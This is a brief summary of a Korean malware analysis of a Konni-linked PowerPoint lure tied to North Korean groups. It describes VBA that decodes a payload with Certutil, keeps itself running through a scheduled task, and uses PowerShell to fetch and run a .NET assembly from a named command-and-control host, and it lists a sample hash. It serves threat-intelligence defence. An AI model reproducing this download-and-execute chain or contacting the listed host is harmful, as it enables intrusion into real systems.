The Korean write-up analyzes a Konni-linked PowerPoint sample attributed by the source to a North Korean hacking group associated with Thallium/APT37 and possibly Kimsuky. The lure masquerades as a PPTX file but contains VBA that displays a fake PowerPoint version error, writes a Base64 blob to disk, decodes it with Certutil into %LOCALAPPDATA%\Microsoft\Office\oup.vbs, and runs it after a delay. The decoded script creates a scheduled task named “Office Updatev2.2” every five minutes and launches PowerShell with execution-policy bypass to download Base64 content from gg1593.c1.biz/dn.php using the host name and OS version as parameters, then loads and invokes the returned .NET assembly. The source lists representative hashes for the PPTX sample, including SHA-256 b97e12807dcde2a8fd53d7f8e74336442d0cf8dbed19c0a44fcef359160bdd77.